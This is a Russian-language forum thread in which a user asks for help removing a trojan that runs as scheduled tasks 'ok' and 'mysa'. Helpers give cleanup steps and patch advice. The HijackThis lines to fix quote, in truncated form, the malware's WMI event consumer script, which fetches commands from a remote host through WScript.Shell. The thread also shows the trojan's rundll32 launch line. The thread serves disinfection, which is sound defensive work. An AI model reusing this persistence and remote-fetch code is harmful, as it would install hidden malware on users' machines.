Здравствуйте! Сегодня в планировщике заданий обнаружил процесс "ok"
rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Погуглил - оказалось, что троян!
Затем нашёл В папке C:\Windows\System32\Tasks файл "ok" (с замочком)
Почитал отзывы и обнаружил:
В реестре в ветке
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\
нашёл
{58B55F42-754F-4456-9F58-177C34CD2478} path \ok
{A3ECD9C8-4A15-497E-94A2-6F668B2AF398} path \mysa
и в ветке
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree
нашёл папки ok и mysa
Помогите! Можно ли просто удалив все эти задания, файлы и папки (как некоторые советчики в интернете) избавить компьютер от трояна?
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) Raptyle83, спасибо за обращение на наш форум!
Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Также скачал патч против WannaCry, но не установил. Думаю, его надо устанавливать на чистый комп. (шифровальщик наверное успел пролезть до того, как закрыть уязвимость) Правильно делаю?
В похожей теме, увидел совет - выполнить скрипт в AVZ:
begin
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Micr osoft\Windows\CurrentVersion\Run','start1');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Micr osoft\Windows\CurrentVersion\Run','start');
DeleteFile('C:\Windows\system32\Tasks\ok','64');
DeleteFile('C:\Windows\system32\Tasks\Mysa2','64') ;
DeleteFile('C:\Windows\system32\Tasks\Mysa1','64') ;
DeleteFile('C:\Windows\system32\Tasks\Mysa','64');
ExecuteSysClean;
RebootWindows(false);
end.
Подойдёт ли данный способ для моей системы?
Запустите HijackThis, расположенный в папке Autologger и пофиксите (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):
Код:
R3 - HKCU\..\URLSearchHooks: (no name) - {83821C2B-32A8-4DD7-B6D4-44309A78E668} - (no file)
R3 - HKCU\..\URLSearchHooks: (no name) - {eb464721-c571-4123-ae62-d0576af38750} - (no file)
O7 - IPSec: Name: win (2017/11/25) - {9e8a6fb2-91b9-4320-8964-27e9f5686415} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2017/11/25) - {9e8a6fb2-91b9-4320-8964-27e9f5686415} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2017/11/25) - {9e8a6fb2-91b9-4320-8964-27e9f5686415} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2017/11/25) - {9e8a6fb2-91b9-4320-8964-27e9f5686415} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2017/11/25) - {9e8a6fb2-91b9-4320-8964-27e9f5686415} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O25 - WMI Event: [fuckyoumm2_consumer] fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.my0709.xyz:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");fo(1727 bytes)
Устраняйте уязвимость, которую используют в т. ч. нашумевшие в прошлом году шифровальщики WannaCry и Petya, критическое обновление cкачайте для своей системы по ссылке отсюда: http://www.catalog.update.microsoft....px?q=KB4012212
Иначе не избавитесь от заразы.
Удалите Java(TM) 7 Update 25, это устаревшая версия со множеством критических уязвимостей.
Если Java вообще нужна для каких- либо приложений, игр (и Вы точно знаете, для каких именно) - установите текущий билд Java 8.
Учтите, что 64-bit версия Java нужна только для очень ограниченного круга приложений.
Если Java вообще нужна для каких- либо приложений, игр (и Вы точно знаете, для каких именно) - установите текущий билд Java 8.
Учтите, что 64-bit версия Java нужна только для очень ограниченного круга приложений.
Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.
Приложите этот файл к своему следующему сообщению.